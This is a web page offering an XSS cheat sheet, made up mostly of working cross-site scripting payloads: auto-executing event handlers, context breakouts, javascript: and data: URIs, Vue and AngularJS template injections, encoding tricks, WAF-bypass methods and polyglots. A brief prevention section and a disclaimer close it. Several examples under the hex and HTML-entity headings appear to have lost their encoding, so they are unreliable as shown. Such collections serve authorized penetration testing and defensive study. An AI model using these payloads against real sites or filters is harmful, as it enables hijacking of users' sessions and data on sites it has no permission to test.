Cross-Site Scripting (XSS) represents one of the most prevalent and dangerous vulnerabilities in modern web applications. Understanding XSS is crucial for developers who want to build secure, robust applications that protect both their users and their business.
🛡️ Complete XSS Cheat Sheet
500+
XSS Vectors
50+
Event Handlers
25+
Bypass Techniques
10+
Framework Payloads
📋 Table of Contents
⚡ Event Handlers – Auto Execute
Event handlers that execute automatically without user interaction
💡 Pro Tip: These event handlers are ideal for XSS attacks as they don’t require user interaction to trigger.
onload – Element Loaded
<body onload=alert(1)>
<img src=x onload=alert(1)>
<iframe onload=alert(1)></iframe>
onerror – Error Handling
<img src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
onfocus (autofocus) – Auto Focus
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus></select>
<textarea onfocus=alert(1) autofocus></textarea>
SVG Animation Events
<svg><animate onbegin=alert(1) attributeName=x dur=1s></animate>
<svg><animate onend=alert(1) attributeName=x dur=1s></animate>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2></animate>
CSS Animation Events
<style>@keyframes x{}</style><div style=”animation-name:x” onanimationend=”alert(1)”></div>
<style>@keyframes x{}</style><div style=”animation-name:x” onanimationstart=”alert(1)”></div>
Details Toggle
<details ontoggle=alert(1) open>test</details>
<details open ontoggle=alert(1)><summary>Click</summary>XSS</details>
👆 Event Handlers – User Interaction Required
Event handlers that require user interaction to trigger
⚠️ Note: These payloads require user interaction (click, hover, key press, etc.) to execute.
onclick – Click Events
<div onclick=”alert(1)” style=”cursor:pointer”>Click me</div>
<button onclick=”alert(1)”>XSS</button>
<a href=”#” onclick=”alert(1)”>Click</a>
onmouseover – Hover Events
<div onmouseover=”alert(1)” style=”width:100px;height:100px;background:red”></div>
<img src=x onmouseover=”alert(1)”>
<a onmouseover=”alert(1)”>Hover me</a>
Keyboard Events
<input onkeydown=”alert(1)” placeholder=”Type here”>
<textarea onkeyup=”alert(1)”></textarea>
<div contenteditable onkeypress=”alert(1)”>Type here</div>
Form Events
<form onsubmit=alert(1)><input type=submit></form>
<input onchange=alert(1) value=”change me”>
<input oninput=alert(1) placeholder=”Type here”>
Drag and Drop Events
<div draggable=”true” ondrag=”alert(1)”>Drag me</div>
<div ondrop=”alert(1)” ondragover=”event.preventDefault()”>Drop here</div>
Context Menu Events
<div oncontextmenu=”alert(1)”>Right click me</div>
<input onauxclick=”alert(1)” value=”Middle click”>
🔄 Consuming Tags
Tags that consume content until their closing tag, useful for escaping contexts
💡 Usage: These tags consume all content until their closing tag, making them useful for breaking out of attribute contexts.
Script Consuming
<script><img title=”</script><img src onerror=alert(1)>”></script>
Style Consuming
<style><img title=”</style><img src onerror=alert(1)>”></style>
Textarea Consuming
<textarea><img title=”</textarea><img src onerror=alert(1)>”></textarea>
Title Consuming
<title><img title=”</title><img src onerror=alert(1)>”></title>
Noscript Consuming
<noscript><img title=”</noscript><img src onerror=alert(1)>”></noscript>
Iframe Consuming
<iframe><img title=”</iframe><img src onerror=alert(1)>”></iframe>
🔗 JavaScript Protocols
Using javascript: protocol in various contexts
Basic JavaScript Protocol
<a href=”javascript:alert(1)”>XSS</a>
<iframe src=”javascript:alert(1)”></iframe>
<object data=”javascript:alert(1)”></object>
Case Insensitive Protocol
<a href=”JaVaScript:alert(1)”>XSS</a>
<a href=”JAVASCRIPT:alert(1)”>XSS</a>
Protocol with Whitespace
<a href=” javascript:alert(1)”>XSS</a>
<a href=”javascript :alert(1)”>XSS</a>
SVG with XLink
<svg><a xlink:href=”javascript:alert(1)”><text x=”20″ y=”20″>XSS</text></a></svg>
Data Protocol
<script src=”data:text/javascript,alert(1)”></script>
<iframe src=”data:text/html,<script>alert(1)</script>”></iframe>
Form Actions
<form action=”javascript:alert(1)”><input type=”submit”></form>
<input type=”submit” formaction=”javascript:alert(1)” value=”XSS”>
⚛️ Framework Template Injections
Client-side template injection payloads for popular frameworks
Vue.js Payloads
- Version 2: {{constructor.constructor(‘alert(1)’)()}}
- Version 2: {{_c.constructor(‘alert(1)’)()}}
- Version 3: {{_openBlock.constructor(‘alert(1)’)()}}
- Version 3: {{$emit.constructor`alert(1)`()}}
AngularJS Payloads
- v1.0.1-1.1.5: {{constructor.constructor(‘alert(1)’)()}}
- v1.2.0-1.2.1: Complex prototype chain exploit
- v1.6.0+: {{$on.constructor(‘alert(1)’)()}}
- CSP Bypass: ng-focus with orderBy filter
React JSX Injection
- dangerouslySetInnerHTML prop
- Server-side rendering vulnerabilities
- Props injection through URL parameters
Vue.js v2 Basic
{{constructor.constructor(‘alert(1)’)()}}
{{_c.constructor(‘alert(1)’)()}}
<div v-html=”‘<script>alert(1)</script>'”></div>
Vue.js v3 Advanced
{{_openBlock.constructor(‘alert(1)’)()}}
{{_createVNode.constructor(‘alert(1)’)()}}
<teleport to=”script”>alert(1)</teleport>
AngularJS Modern
{{$on.constructor(‘alert(1)’)()}}
{{constructor.constructor(‘alert(1)’)()}}
AngularJS CSP Bypass
<input autofocus ng-focus=”$event.composedPath()|orderBy:'[].constructor.from([1],alert)'”>
🔐 Encoding & Obfuscation
Various encoding techniques to bypass filters
💡 Pro Tip: Encoding techniques can help bypass weak input sanitization and Web Application Firewalls (WAFs).
Unicode Escapes
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
Hex Encoding
<script>eval(‘\x61lert(1)’)</script>
<a href=”javascript:alert(1)”>XSS</a>
Octal Encoding
<script>eval(‘\141lert(1)’)</script>
<script>eval(‘alert(\061)’)</script>
<script>eval(‘alert(\61)’)</script>
Base64 Encoding
<script src=”data:text/javascript;base64,YWxlcnQoMSk=”></script>
<iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe>
HTML Entities
<img src=x onerror=alert(‘XSS’)>
<a href=”javascript:alert(1)”>XSS</a>
<a href=”java script:alert(1)”>XSS</a>
URL Encoding
<a href=”javascript:x=’%27-alert(1)-%27′;”>XSS</a>
%3Cscript%3Ealert(1)%3C/script%3E
Double URL Encoding
%253Cscript%253Ealert(1)%253C/script%253E
<a href=”javascript:%2561lert(1)”>XSS</a>
Mixed Encoding
<script>eval(‘\u0061l\x65rt(1)’)</script>
<script>eval(‘\141l\x65rt(1)’)</script>
🔥 WAF Bypass Techniques
Advanced methods to bypass Web Application Firewalls
⚠️ Advanced Techniques: These methods are designed to bypass modern security filters and WAFs.
No Parentheses – Exception Handling
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
Template Literals
<script>alert`1`</script>
<script>eval`alert\x281\x29`</script>
<script>setTimeout`alert\x281\x29`</script>
Constructor Tricks
<script>[].constructor.constructor(‘alert(1)’)()</script>
<script>”.constructor.constructor(‘alert(1)’)()</script>
<script>( {}).constructor.constructor(‘alert(1)’)()</script>
String Concatenation
<script>window[‘ale’+’rt’](1)</script>
<script>self[‘al’+’ert’](1)</script>
<script>top[‘aler’+’t’](1)</script>
RegExp Source Property
<script>window[/al/.source+/ert/.source](1)</script>
<script>self[/al/.source+/ert/.source](1)</script>
Location Redirect
<script>location=’javascript:alert\x281\x29′</script>
<script>location=name</script>
🎭 Polyglot Payloads
Universal payloads that work in multiple contexts
💡 Polyglots: These payloads are designed to work across multiple contexts and bypass various filters simultaneously.
Universal Polyglot 1
javascript:/*–></title></style></textarea></script></xmp><svg/onload=’+/+”/onmouseover=1/+/[*/[]/+alert(1)//>
Universal Polyglot 2
javascript:”/*’/*`/*–></noscript></title></textarea></style></template></noembed></script><html \” onmouseover=/*<svg/*/onload=alert()//>
Multi-Context Polyglot
” onclick=alert(1)//” onmouseover=”alert(1)//” autofocus onfocus=alert(1)//
Attribute Context Polyglot
‘ onclick=’alert(1)’ style=’position:absolute;left:0;top:0;width:5000px;height:5000px;’ ‘
🚫 Restricted Characters Bypass
Techniques for bypassing character restrictions
No Parentheses Using ES6
<script>’alert\x281\x29’instanceof{[Symbol.hasInstance]:eval}</script>
<script>’alert\x281\x29’instanceof{[Symbol[‘hasInstance’]]:eval}</script>
Without Greater Than
<svg onload=alert(1)
<svg onload=alert(1)<!–
Destructuring Assignment
<script>throw[onerror]=[alert],1</script>
<script>var{a:onerror}={a:alert};throw 1</script>
Using Window.name
<script>window.name=’javascript:alert(1)’;</script><svg onload=location=name>
📱 Mobile & Modern Browsers
XSS vectors specific to mobile devices and modern browsers
Touch Events (Mobile)
<body ontouchstart=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchend=alert(1)>
WebKit Specific
<style>@keyframes x{}</style><div style=”animation-name:x” onwebkitanimationend=”alert(1)”></div>
<video controls src=x onwebkitfullscreenchange=alert(1)></video>
Modern CSS Features
<div oncontentvisibilityautostatechange=alert(1) style=display:block;content-visibility:auto></div>
<div onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>test</div></div>
Import Statement
<script>import(‘data:text/javascript,alert(1)’)</script>
<script type=”module”>import(‘data:text/javascript,alert(1)’)</script>
🛠️ Testing & Tools
Tools and techniques for XSS testing
Professional Tools
- Burp Suite Professional
- OWASP ZAP
- XSSHunter for Blind XSS
- BeEF (Browser Exploitation Framework)
- XSSer – Automated XSS detection
Browser Extensions
- XSS Rays (Chrome)
- Hack-Tools
- Wappalyzer
- Cookie Editor
- User-Agent Switcher
Online Resources
- PortSwigger Web Security Academy
- OWASP XSS Filter Evasion
- PayloadsAllTheThings GitHub
- HackerOne Disclosed Reports
- XSS Game by Google
Testing Methodology
- Input validation testing
- Context-aware payload selection
- Filter bypass techniques
- Blind XSS detection
- Manual verification of findings
🛡️ Prevention & Mitigation
Best practices for preventing XSS vulnerabilities
🔒 Defense in Depth: Combine multiple prevention techniques for maximum security.
Input Validation
- Whitelist-based validation
- Strict data type checking
- Length restrictions
- Format validation (regex)
- Business logic validation
Output Encoding
- HTML context encoding
- JavaScript context encoding
- CSS context encoding
- URL context encoding
- Context-aware sanitization
Content Security Policy
- default-src ‘self’
- script-src with nonces
- object-src ‘none’
- base-uri ‘self’
- report-uri for monitoring
Security Headers
- X-Content-Type-Options: nosniff
- X-Frame-Options: DENY
- X-XSS-Protection: 1; mode=block
- Referrer-Policy: strict-origin
- Permissions-Policy
Example CSP Header
Content-Security-Policy: default-src ‘self’; script-src ‘self’ ‘nonce-random123’; style-src ‘self’ ‘unsafe-inline’; img-src ‘self’ data:; object-src ‘none’; base-uri ‘self’; form-action ‘self’; report-uri /csp-report;
⚠️ Legal and Ethical Disclaimer
This XSS cheat sheet is provided for educational and authorized security testing purposes only.
- Always obtain proper written authorization before testing any systems
- Unauthorized testing is illegal and unethical
- Use these techniques only on systems you own or have explicit permission to test
- Respect responsible disclosure practices when reporting vulnerabilities
- Follow your organization’s security testing policies
